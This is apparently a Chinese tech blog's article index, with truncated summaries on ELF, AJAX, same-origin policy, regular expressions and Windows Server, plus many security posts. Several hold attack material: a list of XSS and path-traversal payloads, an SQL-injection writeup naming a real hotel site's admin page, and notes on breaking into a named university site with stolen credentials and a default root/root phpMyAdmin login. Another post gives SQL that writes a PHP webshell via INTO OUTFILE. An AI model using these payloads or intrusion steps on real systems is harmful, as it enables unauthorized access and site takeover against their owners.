摘要:ELF(Executable and Linking Format)是一种对象文件的格式,用于定义不同类型的对象文件(Object files)中都放了什么东西、以及都以什么样的格式去放这些东西。它自最早在 System V 系统上出现后,被 xNIX 世界所广泛接受,作为缺省的二进制文件格式来使用。可以说,ELF是构成众多xNIX系统的基础之一,所以作为嵌入式Linux系统乃至内核驱动程序开发人员,你最好熟悉并掌握它。其实,关于ELF这个主题,网络上已经有相当多的文章存在,但是其介绍的内容比较分散,使得初学者不太容易从中得到一个系统性的认识。为了帮助大家学习,我这里打算写一系列连贯的文章来介
阅读全文
AJAX && JSON之讲解
摘要:Ajax技术的核心是XMLHttpRequest对象(简称XHR),可以通过使用XHR对象获取到服务器的数据,然后再通过DOM将数据插入到页面中呈现。虽然名字中包含XML,但Ajax通讯与数据格式无关,所以我们的数据格式可以是XML或JSON等格式。 XMLHttpRequest对象用于在后台与服务器交换数据,具体作用如下:在不重新加载页面的情况下更新网页在页面已加载后从服务器请求数据在页面已加载后从服务器接收数据在后台向服务器发送数据 本文目录:XMLHttpRequest的用法Ajax同源请求同源策略与跨源策略Ajax跨源请求 1.1.2 正文 XMLHttpReques...
阅读全文
pwn2own
摘要:Pwn2Own是全球最著名的黑客大赛之一,由美国五角大楼入侵防护系统供应商TippingPoint的DVLabs赞助,今年已经是第六届。1比赛规则参赛黑客们的目标是4大主流网页浏览器——IE、Firefox、Chrome和Safari,平台是在安装安全更新的Windows 7操作系统下运行,Safari浏览器将在安装苹果Mac OS X 10.6雪豹操作系统下运作,顺利攻破一个主流浏览器便奖励1万美元,共4万美元。为了增加比赛难度,参加黑客竞赛的参赛者不准使用Adobe Flash等第三方外挂。这些第三方外挂一直都是操作系统中的安全弱项,破解专家Charlie Miller说只要浏览器装有Ja
阅读全文
揭秘顶尖黑客
摘要:“昏暗的室内,一人打开笔记本电脑,双手迅速在键盘上飞舞,屏幕上一排排字符快速滚动。没过多久,‘滴’的一声,系统提示成功进入,机密信息瞬间到手。他嘴角稍稍上扬,合上电脑,消失在夜幕中……”这是影视作品中经常呈现的黑客形象,很酷很拉风有木有?那么,现实中的顶尖黑客究竟是什么样子?他们的生活真的和常人有所
阅读全文
Keen Team
摘要:Keen Team (碁震安全研究团队,KeenTeam)是一支由在信息安全理论和技术研究方面全球领先的中国“白帽”安全专家组成的信息安全研究队伍,成员主要来自微软的安全漏洞研究、安全攻击和防御技术研究、安全应急响应团队。目前,KeenTeam是世界范围内由厂商官方确认发现计算机漏洞数量最多、最了解
阅读全文
同源策略之深入讲解
摘要:概念:同源策略是客户端脚本(尤其是Javascript)的重要的安全度量标准。它最早出自Netscape Navigator2.0,其目的是防止某个文档或脚本从多个不同源装载。这里的同源指的是:同协议,同域名和同端口。精髓:它的精髓很简单:它认为自任何站点装载的信赖内容是不安全的。当被浏览器半信半疑的脚本运行在沙箱时,它们应该只被允许访问来自同一站点的资源,而不是那些来自其它站点可能怀有恶意的资源。为什么要有同源限制?我们举例说明:比如一个黑客程序,他利用IFrame把真正的银行登录页面嵌到他的页面上,当你使用真实的用户名,密码登录时,他的页面就可以通过Javascript读取到你的表单中in
阅读全文
同源策略与同源策略之绕过
摘要:一.什么是同源策略 同源策略,它是由Netscape提出的一个著名的安全策略,现在所有的可支持javascript的浏览器都会使用这个策略。 为什么需要同源策略,这里举个例子: 假设现在没有同源策略,会发生什么事情呢?大家知道,JavaScript可以做很多东西,比如:读取/修改网页中某个值。恩,你现在打开了浏览器,在一 个tab窗口中打开了银行网站,在另外一个tab窗口中打开了一个恶意网站,而那个恶意网站挂了一个的专门修改银行信息的JavaScript,当你访问 这个恶意网站并且执行它JavaScript时,你的银行页面就会被这个JavaScript修改,后果会非常严重!而同源策略就为...
阅读全文
同源策略
摘要:同源策略,它是由Netscape提出的一个著名的安全策略。现在所有支持JavaScript 的浏览器都会使用这个策略。所谓同源是指,域名,协议,端口相同。当一个浏览器的两个tab页中分别打开来 百度和谷歌的页面当浏览器的百度tab页执行一个脚本的时候会检查这个脚本是属于哪个页面的,即检查是否同源,只有和百度同源的脚本才会被执行。
阅读全文
XSS跨站脚本测试用例
摘要:'>='>%3Cscript%3Ealert('XSS')%3C/script%3E%0a%0a.jsp%22%3cscript%3ealert(%22xss%22)%3c/script%3e%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e%3c/title%3e%3cscript%3e
阅读全文
pkav漏洞之精华部分
摘要:影响巨大的逻辑型漏洞TOM邮箱任意密码秒改网易手机邮箱任意密码重置强行绑定交通银行免费买车漏洞中国建设银行刷人民币漏洞腾讯任意QQ号码注册微信任意用户密码修改漏洞新浪微搏修改任意用户密码 最有洞察力手把手教你劫持李开复的腾讯微博腾讯QQ聊天框XSSQQ客户端文件执行漏洞当 |XSS蠕虫| 与 |QQ系统消息推送| 双剑合璧利用数据库缺陷实现刷乌云币腾讯单点登录系统clientkey劫持漏洞腾讯WEBQQ聊天功能XSS腾讯QQ聊天消息溢出刷乌云WB漏洞腾讯3个鸡肋漏洞组合的利用腾讯3366小游戏站算法被破解 浏览器安全专辑360安全浏览器chrome cross-zone漏洞IE9 远程...
阅读全文
后台SQL注入实例
摘要:简要描述:汉庭连锁酒店后台SQL注入,可绕过登陆限制进入后台,可脱库.详细说明:问题发生在这个站点.http://miaosha.htinns.com/标题内没有写具体信息.因为怕发布后被人入侵.后台登陆地址为:http://miaosha.htinns.com/admin/admin_login.php帐号输入admin'登陆后提示如下图爆出了查询语句.Database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
阅读全文
腾讯3366小游戏站算法被破解
摘要:简要描述:对于这样一个网站来说.积分算法被破解.就等于可以随意修改自己的分数.严重程度可想而知.详细说明:某日和我家程序员一起出差去做一个项目.然后夜里俩人打赌,谁先破解出来3366的算法,输的人第二天就要请胜利者足疗.于是乎便有了下面的故事.最终的结果是我家伟大的程序员取得了整场比赛的胜利!恭喜她,她就是verkey!!!!!好,下面我来分析下整个算法的破解过程.我在3366.com上选取了一款玩的人最多的积分游戏.名字叫做彩色砖块,由于我水平太差,第一盘只得了31分,如下图1.对上图数据抓包得到以下内容qzversion=0&platform=1&key=bgvbapy1c
阅读全文
JavaScript破解验证码
摘要:现在,Megaupload站点提供的CAPTCHA在上述代码面前已经败下阵来,说实话,这里的验证码设计的不不太好。但更有趣的是: 1.HTML 5中的Canvas应用程序接口getImageData可以用来从验证码图像中取得像素数据。利用Canvas,我们不仅可以将一个图像嵌入一个画布中,而且之后还可以再从中重新提取出来。 2.上述的脚本中包含一个完全使用JavaScript实现的神经网络。 3.使用Canvas从图像中提取出像素数据后,将其送入神经网络,通过一种简单的光学字符识别技术来推测验证码中到底使用了哪些字符。 通过阅读源代码,我们不仅可以更好地理解其工作原理,也可以领会这个验...
阅读全文
精通JavaScript攻击框架:AttackAPI
摘要:多年来客户端安全一直未引起人们的足够重视,但是如今情况发生了急剧转变,客户端安全已经成为信息安全领域的焦点之一。Web恶意软件、AJAX蠕虫、浏览历史暴破、登录检测、傀儡控制技术网络端口扫描以及浏览器劫持等各种技术只是安全研究人员地下实验室的部分技术,但是已经带来了非常大的影响。一种类型的安全专业浮现并变成主流利用机制时,供应厂商和个人就会开始发行框架和自动工具,来处理工具和测试过程。虽然供应厂商最初主要将精力放在AJAX审计工具方面,但是安全研究人员更关注的是连绵的系统边界,以探索事实真相。由于存在多种可能的攻击矢量,Web应用程序安全社区也建立了多个框架来探测、利用安全漏洞,从而揭示Web
阅读全文
Malware
摘要:电脑病毒的一种, 中文名为“马威尔”, 有多种病毒变种。1概述Malware这个单词来自于Malicious和Software两个单词的合成,是恶意软件的专业术语,专指那些泛滥于网络中的恶意代码。Malware就是植入你电脑中的恶意代码,它可以完全控制、破坏你的PC、网络以及所有数据。在日益恶化的网络环境中忽略Malware的危害是一件非常不理智的行为。认识Malware有助于免受其侵害。Malware包含了以下几个种类:* Computer Viruses >>>计算机病毒* Computer Worms >>>计算机蠕虫* Trojan Horses &
阅读全文
XSS-Proxy之技术总结
摘要:今天看了大风的文章,关于Cross Iframe Trick的思路。让我想到了曾经看到的关于XSS Proxy的一些文章。Advanced Cross-Site-Scripting with Real-time Remote Attacker Control,精彩之处:还有一篇关于Advanced XSS attacks and XSS-Proxy的PPT。都是05年的资料了。它的主要思想是:在有XSS漏洞(持久型或非持久型)的网站上嵌入监控脚本,这样的脚本可以动态生成一个iframe,并可控制iframe的location值(八卦下~遨游很BT)。监控脚本控制iframe加载同域下的其它文档
阅读全文
XSS-Proxy
摘要:关于XSS(cross site scripting),相信对此有过研究的人已经感受到了它的“魅力”,权威机构也公布了最近的安全数据,xss已经上升为第二大网络安全隐患;于此我想通过此文浅析一下xss-proxy(perl-based)这个工具的具体使用过程,因为现在这个话题好像被互联网发展的势头仍到了“乌托邦”。一、搭建xss-proxy server(1)安装activeperl(perl解析器)(2)修改xss-proxy.pl这里主要是修改code_server和server_port两个参数,code_server是本地的xss-proxy server服务器域名,我用的是本地地址。
阅读全文
CDN
摘要:CDN的全称是Content Delivery Network,即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息将用户的请求重新导向离用户最近的服务节点上。其目的是使用户可就近取得所需内容,解决 Internet网络拥挤的状况,提高用户访问网站的响应速度。1服务模式内容分发网络是一种新型网络内容服务体系,其基于IP网络而构建,基于内容访问与应用的效率要求、质量
阅读全文
GOOGLE HACK
摘要:intext:关键字把网页正文内某个关键字作为搜索条件-------------------intitle:关键字把网页标题内某个关键字作为搜索条件-------------------inurl:关键字搜索含有关键字的url地址-------------------link:关键字查找与关键字做了链接的url地址-------------------site:域名返回域名中所有url地址-------------------filetype:文件名.后缀名搜索特定的文件-------------------cache:搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦。---
阅读全文
Windows 2008 R2
摘要:1简介Windows 2008 R2是微软针对windows 7所推出的Windows server操作系统。为了使企业减少操作成本和提高效率,Windows Server 2008 R2对企业资源访问提供强大的管理控制能力。它通过减少电源消耗以及降低管理成本,以提供更好的能源利用效率与性能。它还有助于改善分支机构的管理,值得期待的远程访问体验。更高效的服务器管理,流线型的服务器管理支持远程登录,以及将微软虚拟化策略应用到客户端和服务器上。2特点强大的硬件与伸缩功能Windows Server 2008 R2是基于Windows Server 2008硬件基础而设计的,将有更好的稳定性。 另外
阅读全文
Windows 2003 R2
摘要:微软发布Windows Server 2003 R2版的目的是希望透过它填补Windows Server 2003SP1和Longhorn Server之间的产品发布时间间隔。微软向产品测试人员表示,Windows Server 2003 R2是Windows Server的过渡时期版本,它的核心基于Windows Server 2003 SP1平台,以及一些用户选择安装的部件。另外,这个R2版也包含了不少新特性:*活动目录应用模式(ADAM);*SharePoint 2*活动目录联合服务(ADFS),也称为TrustBridge;*分公司文件复制服务(FRS);*常用登陆文件系统(CLFS)
阅读全文
Microsoft SQL Server 2008 R2
摘要:1概述Microsoft SQL Server 2008 R2 提供完整的企业级技术与工具,帮助您以最低的总拥有成本获得最有价值的信息。您可以充分享受高性能,高可用性,高安全性,使用更多的高效管理与开发工具,利用自服务的商业智能实现更为广泛深入的商业洞察。2关键特性为任何规模的应用提供完备的信息平台。可管理的,熟悉的自服务商业智能(BI)工具。支持大规模数据中心与数据仓库。支持平滑建立与扩展应用到云端与微软的应用平台紧密集成3最新功能SQL Server 2008 R2引进了一系列新功能帮助各种规模的业务从信息中获取更多价值。经过改进的SQL Server 2008 R2增强了开发能力,提高了
阅读全文
Thinkphp2.1爆出重大安全漏洞
摘要:thinkphp 2.1的版本我们来分析下漏洞吧官方发布了一个安全补丁表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。官方的补丁:/trunk/ThinkPHP/Lib/Core/Dispatcher.class.php125 –$res = preg_replace(‘@(w+)’.$depr.’([^'.$depr.'/]+)@e’, ‘$var['\1']=”\2″;’, implode($depr,$paths));125 + $res = preg_replace(‘@(w+)’.$depr.’([^'.$depr.'
阅读全文
渗透笔记0x00
摘要:今天朋友在入侵织梦的网站系统,通过最新的Exp获得了织梦后台的账号和密码账号:admin密码:abc123456但是,找来找去找不到后台,就让我提权试试。我看了下:http://pxc.ncist.edu.cn/dede/后台被删除了!怎么办??google hack也没找到后台后来,我试了试这个网站:http://zsjy.ncist.edu.cn/phpmyadmin输入默认MySql账号与密码:账号:root密码:root居然进去了:接下来就是phpmyadmin提权了:我的思路是:1.先爆出php服务器www的路径2.然后通过将php一句话插入数据库再导出到www路径通过google
阅读全文
phpmyadmin后台4种拿shell方法 && php爆路径大法
摘要:php后台拿shell要知道php的路径,文章下面将讲诉爆php路径的方法!!!方法一:CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('');SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';----以上同时执行,在数据库: mysql 下创建一个表名为:xss,字段为xss1,导出到D:/www/x.php一句话连接密码:xiaoma方法二:Creat
阅读全文
Modify Headers模拟不同地域进行网页测试
摘要:今天要简单讲一下Modify Headers这个Firefox插件,记录一下我是怎么使用它的。Modify Headers:https://addons.mozilla.org/zh-CN/firefox/addon/modify-headers/简单的说,这个插件的主要作用是对Firefox的HTTP request headers进行添加、修改和过滤等操作。当我们访问网站的时候,某些网站服务器会对访问网站的浏览器Header信息进行判断,然后决定用什么方式把网站内容呈现给浏览器。服务器也会根据浏览器的header中包含的其他信息(譬如浏览器所在的IP地址)判断是否要讲某一特定的信息呈现给浏
阅读全文
x-forwarded-for之深度挖掘
摘要:如今利用nginx做负载均衡的实例已经很多了,针对不同的应用场合,还有很多需要注意的地方,本文要说的就是在通过CDN 后到达nginx做负载均衡时请求头中的X-Forwarded-For项到底发生了什么变化。下图为简单的web架构图:先来看一下X-Forwarded-For的定义:X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。它不是RFC中定义的标准请求头信息,在squid缓存代理服务器开发文档中可以找到该项的详细介绍。标准格式如下:X-Forwarded-For: client1, p
阅读全文
正则表达式编程
摘要:可以在 JScript 中使用正则表达式搜索字符串中的模式、替换文本以及提取子字符串。搜索以下 JScript 示例查找某个单词的所有匹配项。创建该正则表达式的语句为var re = /\w+/g;/\w+/模式指定匹配以下一个或多个任意字符:A-Z、a-z、0-9 和下划线字符。模式之后的g(全局)标志,指示搜索操作应查找该模式的所有匹配项,而不仅仅是第一个匹配项。还可以使用以下 JScript 替换语法。var re = new RegExp("\\w+", "g");要检索每个匹配项,exec 方法将从lastIndex位置继续搜索,直到返回 Nu
阅读全文
构造正则表达式说明
摘要:“正则表达式”描述在搜索文本正文时要匹配的一个或多个字符串。正则表达式可用作与要搜索的文本相比较的字符模式。正则表达式的结构与所创建的算术表达式的结构类似。较大的表达式可由小的表达式通过使用各种元字符和运算符进行组合而创建。正则表达式的各组成部分可以是单个字符、字符集、字符范围或在几个字符之间选择。也可以是这些组成部分的任意组合。构造正则表达式通过在一对分隔符之间放置表达式的各种组成部分,就可以构建正则表达式。在 JScript 中,分隔符是一对正斜杠 (/) 字符,如以下示例所示。/expression/正则表达式示例下表包含典型正则表达式的示例。正则表达式说明/^\s*$/匹配空行。/\d
阅读全文
正则表达式之语法规则
摘要:“正则表达式”描述在搜索文本正文时要匹配的一个或多个字符串。该表达式可用作一个将字符模式与要搜索的字符串相匹配的模板。正则表达式包括普通字符(例如,a 到 z 之间的字母)和特殊字符(称为“元字符”)。特殊字符元字符下表包含了多字符元字符的列表以及它们在正则表达式中的行为。元字符行为示例\b与一个字边界匹配;即字与空格间的位置。er\b与“never”中的“er”匹配,但与“verb”中的“er”不匹配。\B非边界字匹配。er\B与“verb”中的“er”匹配,但与“never”中的“er”不匹配。\d数字字符匹配。等效于[0-9]。在搜索字符串“12 345”中,\d{2}与“12”和“34
阅读全文
PHP正则表达式之快速学习法
摘要:1、入门简介简单的说,正则表达式是一种可以用于模式匹配和替换的强有力的工具。我们可以在几乎所有的基于UNIX系统的工具中找到正则表达式的身影,例如,vi编辑器,Perl或PHP脚本语言,以及awk或sed shell程序等。此外,象JavaScript这种客户端的脚本语言也提供了对正则表达式的支持。由此可见,正则表达式已经超出了某种语言或某个系统的局限,成为人们广为接受的概念和功能。正则表达式可以让用户通过使用一系列的特殊字符构建匹配模式,然后把匹配模式与数据文件、程序输入以及WEB页面的表单输入等目标对象进行比较,根据比较对象中是否包含匹配模式,执行相应的程序。 举例来说,正则表达式的一个.
阅读全文
